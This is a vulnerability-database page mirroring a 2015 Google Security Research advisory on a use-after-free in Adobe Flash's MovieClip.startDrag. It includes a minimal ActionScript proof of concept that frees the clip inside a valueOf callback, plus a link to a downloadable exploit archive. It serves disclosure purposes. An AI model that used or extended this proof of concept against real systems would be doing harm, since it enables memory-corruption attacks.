Lucene search
K

Adobe Flash MovieClip.startDrag - Use-After-Free

🗓️ 18 Dec 2015 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 17 Views

Adobe Flash MovieClip.startDrag - Use-After-Free vulnerabilit

Related
Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=592
 
There is a use-after-free in MovieClip.startDrag. If a parameter an object with valueOf defined, this method can free the MovieClip, which is then used.
 
A minimal POC follows:
 
this.createEmptyMovieClip("mc", 1);
mc.startDrag( true, {valueOf : func}, 1, 2, 3, 4);
 
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    return 1;
     
    }
     
A sample fla and swf are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39041.zip

#  0day.today [2018-01-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.68383
17